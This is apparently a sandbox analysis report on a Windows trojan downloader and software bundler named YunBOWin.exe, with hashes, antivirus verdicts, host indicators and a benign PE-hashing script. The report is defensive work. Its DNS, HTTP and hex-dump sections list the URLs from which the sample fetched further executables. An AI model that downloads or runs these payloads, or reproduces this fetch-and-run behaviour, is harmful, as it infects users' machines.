Analysis Date: 2015-08-24 07:31:36
MD5: 997f4d96782ac3d53c2a2dded6a2aa1b
SHA1: cd06d24804bf45c7e105ce2f782f310e57c9c12b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sections (hashes are over the raw section bytes on disk; size is SizeOfRawData):
  .text   md5: 2158731cac69d8eca392e58fce976548  sha1: d4c8b69f3a3d49a9ea631661227c84087202197b  size: 333824
  .rdata  md5: 470a39f8b40b76bc0ccb3f42fe8ffa19  sha1: 1ee742d040022af98e759c94263cdfe0a70e4f22  size: 84992
  .data   md5: 735f8f5f5ccb763bf7084fc0507d5ed2  sha1: ad4f25de828ac81042f57f13c207c5c918e9fd57  size: 7168
  .rsrc   md5: eceffabc377cdcc2040cd8d67bd408a7  sha1: 6ba420fb9fd82842d49a3ccb1872a093398d4661  size: 210432
  .reloc  md5: 70b316357d66db6410394f508b35e1c9  sha1: 1194c7a1368c2a91f5375708af26b64a663f0b81  size: 15360
Timestamp (PE link time, taken from the COFF header and therefore attacker-controllable): 2015-08-17 07:04:06
PDB path: C:\Users\Administrator\Desktop\Q管\111\Release\nmjh.pdb
Version info (the "TODO: <...>" values are the untouched Visual Studio resource-template placeholders):
  LegalCopyright: Copyright (C) 2015
  InternalName: YunBOWin.exe
  FileVersion: 1.0.0.1
  CompanyName: TODO: <Company name>
  ProductName: TODO: <Product name>
  ProductVersion: 1.0.0.1
  FileDescription: TODO: <File description>
  OriginalFilename: YunBOWin.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 1819fde2f818f5fcb9864909b9ccbfeb1e3778c1
IMPhash: 2726688c611456a39742abadb71dadb0
AV verdicts (18 of 31 engines detect; the detections cluster on generic downloader and Kazy signatures):
  Rising: no_virus
  McAfee: no_virus
  Avira (antivir): TR/Dldr.Agent.741900
  Twister: no_virus
  Ad-Aware: Gen:Variant.Kazy.550455
  Alwil (avast): Malware-gen:Win32:Malware-gen
  Eset (nod32): Win32/TrojanDownloader.Agent.BQU
  Grisoft (avg): Downloader.Generic14.AENM
  Symantec: no_virus
  Fortinet: W32/Agent.BQU!tr.dldr
  BitDefender: Gen:Variant.Kazy.550455
  K7: Trojan-Downloader ( 004cd4381 )
  Microsoft Security Essentials: SoftwareBundler:Win32/Tupseg
  MicroWorld (escan): Gen:Variant.Kazy.550455
  MalwareBytes: no_virus
  Authentium: W32/Downloader.DHWE-7263
  Frisk (f-prot): no_virus
  Ikarus: Backdoor.Win32.Zegost
  Emsisoft: Gen:Variant.Kazy.550455
  Zillya!: no_virus
  Kaspersky: Trojan-Downloader.Win32.Generic
  Trend Micro: no_virus
  CAT (quickheal): no_virus
  VirusBlokAda (vba32): no_virus
  Padvish: no_virus
  BullGuard: Gen:Variant.Kazy.550455
  Arcabit (arcavir): Gen:Variant.Kazy.550455
  CA (E-Trust Ino): no_virus
  ClamAV: no_virus
  Dr. Web: Trojan.DownLoader15.48501
  F-Secure: Gen:Variant.Kazy.550455
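The section hashes, sizes and link timestamp above are read straight out of the PE header, so an analyst can recompute them and cross-check a report before trusting it. The script below is an added example, not code from the original report or from the sandbox that produced it: a stdlib-only Python parser that walks the DOS header, PE signature, COFF header and section table and returns, per section, the MD5/SHA-1 of the raw section bytes and their size, plus the link timestamp formatted the way the report prints it. Because the sample itself is not reproduced here, the script builds a small synthetic PE32 image inline (constructed test data; only the link timestamp 2015-08-17 07:04:06 is taken from the report). It deliberately refuses to hash a section whose raw data runs past the end of the file, and it does not parse the import or debug directories, so IMPhash and the PDB path are outside its scope.

```python
import hashlib
import struct
from datetime import datetime, timezone

# Header layouts from the PE/COFF specification (little-endian).
COFF_HDR = "<HHIIIHH"          # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
                               # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
SECTION_HDR = "<8sIIIIIIHHI"   # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
                               # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
                               # NumberOfLinenumbers, Characteristics
FILE_ALIGN = 0x200


def hash_bytes(raw: bytes) -> dict:
    """MD5/SHA-1 of a section's raw (on-disk) bytes, as sandbox reports list them."""
    return {"md5": hashlib.md5(raw).hexdigest(), "sha1": hashlib.sha1(raw).hexdigest()}


def parse_pe(data: bytes) -> dict:
    """Return the link timestamp and per-section name/size/hashes of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, nsections, tstamp, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, data, coff_off)
    sec_off = coff_off + struct.calcsize(COFF_HDR) + opt_size
    sections = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_HDR, data, sec_off + i * struct.calcsize(SECTION_HDR))
        name, _vsize, _va, raw_size, raw_ptr = fields[:5]
        raw = data[raw_ptr:raw_ptr + raw_size]
        if len(raw) != raw_size:
            # Hashing a short read would silently produce a digest nobody else can reproduce.
            raise ValueError(f"section {name!r}: raw data extends past end of file")
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "size": raw_size, **hash_bytes(raw)})
    link_time = datetime.fromtimestamp(tstamp, tz=timezone.utc)
    return {"timestamp": link_time.strftime("%Y-%m-%d %H:%M:%S"), "sections": sections}


def build_synthetic_pe(sections: list, timestamp: int) -> bytes:
    """Build a minimal PE32 image for testing: DOS stub, COFF header, zeroed
    optional header, section table and file-aligned section data (constructed data)."""
    opt_size = 224                                   # sizeof(IMAGE_OPTIONAL_HEADER32)
    e_lfanew = 0x40
    headers_end = e_lfanew + 4 + struct.calcsize(COFF_HDR) + opt_size + 40 * len(sections)
    first_raw = -(-headers_end // FILE_ALIGN) * FILE_ALIGN
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack(COFF_HDR, 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    table, body, va = bytearray(), bytearray(), 0x1000
    for name, raw in sections:
        padded = raw + b"\0" * (-len(raw) % FILE_ALIGN)
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(raw), va, len(padded),
                             first_raw + len(body), 0, 0, 0, 0, 0x60000020)
        body += padded
        va += -(-len(padded) // 0x1000) * 0x1000
    image = dos + b"PE\0\0" + coff + opt + table
    image += b"\0" * (first_raw - len(image))
    return bytes(image + body)


# Constructed sample image; only the timestamp value is the report's link time (UTC).
SAMPLE_IMAGE = build_synthetic_pe(
    [(b".text", b"\x55\x8b\xec" * 100), (b".rdata", b"hello\0")], timestamp=1439795046)


def demo() -> dict:
    return parse_pe(SAMPLE_IMAGE)


if __name__ == "__main__":
    report = demo()
    print("Timestamp:", report["timestamp"])
    for s in report["sections"]:
        print(f"Section {s['name']:<7} md5: {s['md5']} sha1: {s['sha1']} size: {s['size']}")
```

Run against a real file by replacing SAMPLE_IMAGE with the file's bytes; the per-section digests must match the report line for line, and a section whose SizeOfRawData reaches past end of file is a corrupt or truncated sample, not something to hash.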

Runtime Details:

Screenshot: (image not included in this extract)

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
(both are the proxy-configuration reads WinINet performs on initialisation, consistent with the HTTP activity below)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: YUBO_is_Running
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Of these, YUBO_is_Running is the only mutex not attributable to WinINet's cache handling (the c:!...! names and WininetConnectionMutex, like the index.dat files, appear with any WinINet client) and is the one worth using as a host indicator; its name echoes the InternalName YunBOWin.exe.
Winsock DNS: r.photo.store.qq.com
Winsock DNS: ww4.sinaimg.cn
Winsock DNS: ww2.sinaimg.cn
Winsock DNS: soft.kunjun.org
Winsock DNS: rawtj.photo.store.qq.com
Winsock DNS: yunbo.cdgdyj.com
Winsock DNS: ww3.sinaimg.cn
Winsock DNS: down.360safe.com
Winsock DNS: update.zchon.net
Winsock DNS: d.juezhao123.com

Network Details:

DNS answers (type A; repeated lookups of the same name are collapsed, every address seen is kept):
  d.juezhao123.com                  58.222.24.189
  down.qhcdn.com                    220.169.245.76, 101.226.161.206
  soft.kunjun.org                   222.186.129.195
  n4cswhk3.gccdn.net                174.35.56.225, 174.35.56.144
  na.b9.aicdn.com                   165.254.60.149, 165.254.60.151, 199.192.75.23, 199.192.75.63, 72.20.58.53, 165.254.60.148
  r.photo.store.qq.com              140.207.62.43, 140.207.62.52, 140.207.62.42
  rawtj.photo.store.qq.com          123.151.71.111, 123.151.15.206
  update.zchon.net.w.kunlunar.com   124.160.136.192, 124.160.136.200, 124.160.136.178, 124.160.136.181
  down.360safe.com                  (no address logged)
  ww3.sinaimg.cn                    (no address logged)
  ww4.sinaimg.cn                    (no address logged)
  yunbo.cdgdyj.com                  (no address logged)
  ww2.sinaimg.cn                    (no address logged)
  update.zchon.net                  (no address logged)
The names with no address are ones the sample queried itself (see Winsock DNS above), while the CDN names that carry addresses but never appear in the sample's own lookups (down.qhcdn.com, n4cswhk3.gccdn.net, na.b9.aicdn.com, update.zchon.net.w.kunlunar.com) are consistent with CNAME answers for them that the capture does not show. yunbo.cdgdyj.com is the exception: neither an address nor a matching TCP flow is logged for it, although four of the HTTP requests below are addressed to it.
HTTP requests (15 GETs, every one carrying the same User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)):
  http://d.juezhao123.com/setup/setup_30004.exe
  http://down.360safe.com/p/360se_nanaxt9.exe
  http://soft.kunjun.org:81/guding/QiJi_D10_1.exe
  http://ww3.sinaimg.cn/mw690/3e7a015cjw1euzm6zuvapg207s064he7.gif
  http://ww4.sinaimg.cn/mw690/3e7a015cjw1ev207iv55vg2085064b2e.gif
  http://yunbo.cdgdyj.com/55a87135_1202000320.exe
  http://yunbo.cdgdyj.com/5590b2ba_1202000284.exe
  http://r.photo.store.qq.com/psb?/V10081EY2R2OYD/rL4e04R5Rsbp6FXCKaV.kuzmYsq*0nxw1TMkPUnbDKs!/r/dAW26W7gQwAA
  http://ww2.sinaimg.cn/mw690/3e7a015cjw1ev5li1x950g209d064he9.gif
  http://ww4.sinaimg.cn/mw690/3e7a015cjw1ev1y2htunig20au064e83.gif
  http://yunbo.cdgdyj.com/install1179297.exe
  http://ww4.sinaimg.cn/mw690/3e7a015cjw1euzn1g73wzg203n0471l1.gif
  http://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/Y9LhkCy.YrU1Fwb3a1Z.43ORPvUZc1ZQTpcXGuWkCvs!/r/dBwBAAAAAAAA
  http://update.zchon.net/files/088.exe
  http://yunbo.cdgdyj.com/1.exe
Eight of the fifteen requests fetch executables from five different hosts (d.juezhao123.com, down.360safe.com, soft.kunjun.org on port 81, yunbo.cdgdyj.com, update.zchon.net); the other seven retrieve GIF images from sinaimg.cn and pictures from QQ's photo store. Pulling further installers over plain HTTP is the behaviour consistent with the downloader and software-bundler verdicts above, and the URLs and hosts of the .exe requests are the network indicators to take from this report.
Flows TCP: 192.168.1.1:1032 ➝ 58.222.24.189:80
Flows TCP: 192.168.1.1:1033 ➝ 220.169.245.76:80
Flows TCP: 192.168.1.1:1034 ➝ 222.186.129.195:81
Flows TCP: 192.168.1.1:1035 ➝ 174.35.56.225:80
Flows TCP: 192.168.1.1:1036 ➝ 174.35.56.144:80
Flows TCP: 192.168.1.1:1037 ➝ 165.254.60.149:80
Flows TCP: 192.168.1.1:1038 ➝ 165.254.60.149:80
Flows TCP: 192.168.1.1:1039 ➝ 140.207.62.43:80
Flows TCP: 192.168.1.1:1040 ➝ 174.35.56.144:80
Flows TCP: 192.168.1.1:1041 ➝ 174.35.56.144:80
Flows TCP: 192.168.1.1:1042 ➝ 165.254.60.149:80
Flows TCP: 192.168.1.1:1043 ➝ 174.35.56.144:80
Flows TCP: 192.168.1.1:1044 ➝ 123.151.71.111:80
Flows TCP: 192.168.1.1:1045 ➝ 124.160.136.192:80
Flows TCP: 192.168.1.1:1046 ➝ 165.254.60.149:80

Raw Pcap (client-side request bytes of each HTTP flow). Several dumps continue past the request's terminating CRLF CRLF; the bytes after it (a second "Connection: Keep-Alive", a "Host: rawtj.photo.store.qq.com" fragment, and so on) are stale data left in the capture buffer by an earlier, longer request, not part of the request shown. When extracting indicators from these dumps, cut each one at the first CRLF CRLF.
0x00000000 (00000)   47455420 2f736574 75702f73 65747570   GET /setup/setup
0x00000010 (00016)   5f333030 30342e65 78652048 5454502f   _30004.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000040 (00064)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000a0 (00160)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000b0 (00176)   20642e6a 75657a68 616f3132 332e636f    d.juezhao123.co
0x000000c0 (00192)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f702f33 36307365 5f6e616e   GET /p/360se_nan
0x00000010 (00016)   61787439 2e657865 20485454 502f312e   axt9.exe HTTP/1.
0x00000020 (00032)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000030 (00048)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000040 (00064)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000050 (00080)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000060 (00096)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000070 (00112)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000080 (00128)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000090 (00144)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000a0 (00160)   2e353037 3237290d 0a486f73 743a2064   .50727)..Host: d
0x000000b0 (00176)   6f776e2e 33363073 6166652e 636f6d0d   own.360safe.com.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a0d0a0d 0a         p-Alive......

0x00000000 (00000)   47455420 2f677564 696e672f 51694a69   GET /guding/QiJi
0x00000010 (00016)   5f443130 5f312e65 78652048 5454502f   _D10_1.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000040 (00064)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000a0 (00160)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000b0 (00176)   20736f66 742e6b75 6e6a756e 2e6f7267    soft.kunjun.org
0x000000c0 (00192)   3a38310d 0a436f6e 6e656374 696f6e3a   :81..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316575 7a6d367a 75766170   15cjw1euzm6zuvap
0x00000020 (00032)   67323037 73303634 6865372e 67696620   g207s064he7.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 332e7369 6e61696d   Host: ww3.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 32303769 76353576   15cjw1ev207iv55v
0x00000020 (00032)   67323038 35303634 6232652e 67696620   g2085064b2e.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....

0x00000000 (00000)   47455420 2f353561 38373133 355f3132   GET /55a87135_12
0x00000010 (00016)   30323030 30333230 2e657865 20485454   02000320.exe HTT
0x00000020 (00032)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000030 (00048)   2f2a0d0a 41636365 70742d45 6e636f64   /*..Accept-Encod
0x00000040 (00064)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000050 (00080)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent: 
0x00000060 (00096)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000070 (00112)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000080 (00128)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000090 (00144)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000a0 (00160)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000b0 (00176)   743a2079 756e626f 2e636467 64796a2e   t: yunbo.cdgdyj.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a6e    Keep-Alive....n
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....

0x00000000 (00000)   47455420 2f353539 30623262 615f3132   GET /5590b2ba_12
0x00000010 (00016)   30323030 30323834 2e657865 20485454   02000284.exe HTT
0x00000020 (00032)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000030 (00048)   2f2a0d0a 41636365 70742d45 6e636f64   /*..Accept-Encod
0x00000040 (00064)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000050 (00080)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent: 
0x00000060 (00096)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000070 (00112)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000080 (00128)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000090 (00144)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000a0 (00160)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000b0 (00176)   743a2079 756e626f 2e636467 64796a2e   t: yunbo.cdgdyj.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a6e    Keep-Alive....n
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....

0x00000000 (00000)   47455420 2f707362 3f2f5631 30303831   GET /psb?/V10081
0x00000010 (00016)   45593252 324f5944 2f724c34 65303452   EY2R2OYD/rL4e04R
0x00000020 (00032)   35527362 70364658 434b6156 2e6b757a   5Rsbp6FXCKaV.kuz
0x00000030 (00048)   6d597371 2a306e78 7731544d 6b50556e   mYsq*0nxw1TMkPUn
0x00000040 (00064)   62444b73 212f722f 64415732 36573767   bDKs!/r/dAW26W7g
0x00000050 (00080)   51774141 20485454 502f312e 310d0a41   QwAA HTTP/1.1..A
0x00000060 (00096)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000070 (00112)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000080 (00128)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000090 (00144)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000a0 (00160)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000b0 (00176)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000c0 (00192)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000d0 (00208)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 2e70686f   27)..Host: r.pho
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 356c6931 78393530   15cjw1ev5li1x950
0x00000020 (00032)   67323039 64303634 6865392e 67696620   g209d064he9.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 322e7369 6e61696d   Host: ww2.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316576 31793268 74756e69   15cjw1ev1y2htuni
0x00000020 (00032)   67323061 75303634 6538332e 67696620   g20au064e83.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f696e73 74616c6c 31313739   GET /install1179
0x00000010 (00016)   3239372e 65786520 48545450 2f312e31   297.exe HTTP/1.1
0x00000020 (00032)   0d0a4163 63657074 3a202a2f 2a0d0a41   ..Accept: */*..A
0x00000030 (00048)   63636570 742d456e 636f6469 6e673a20   ccept-Encoding: 
0x00000040 (00064)   677a6970 2c206465 666c6174 650d0a55   gzip, deflate..U
0x00000050 (00080)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000060 (00096)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000070 (00112)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000080 (00128)   6e646f77 73204e54 20352e31 3b205356   ndows NT 5.1; SV
0x00000090 (00144)   313b202e 4e455420 434c5220 322e302e   1; .NET CLR 2.0.
0x000000a0 (00160)   35303732 37290d0a 486f7374 3a207975   50727)..Host: yu
0x000000b0 (00176)   6e626f2e 63646764 796a2e63 6f6d0d0a   nbo.cdgdyj.com..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a6563 74696f6e   -Alive....ection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f6d7736 39302f33 65376130   GET /mw690/3e7a0
0x00000010 (00016)   3135636a 77316575 7a6e3167 3733777a   15cjw1euzn1g73wz
0x00000020 (00032)   67323033 6e303437 316c312e 67696620   g203n0471l1.gif 
0x00000030 (00048)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000040 (00064)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000050 (00080)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000060 (00096)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000070 (00112)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000080 (00128)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000090 (00144)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x000000a0 (00160)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000b0 (00176)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000c0 (00192)   486f7374 3a207777 342e7369 6e61696d   Host: ww4.sinaim
0x000000d0 (00208)   672e636e 0d0a436f 6e6e6563 74696f6e   g.cn..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
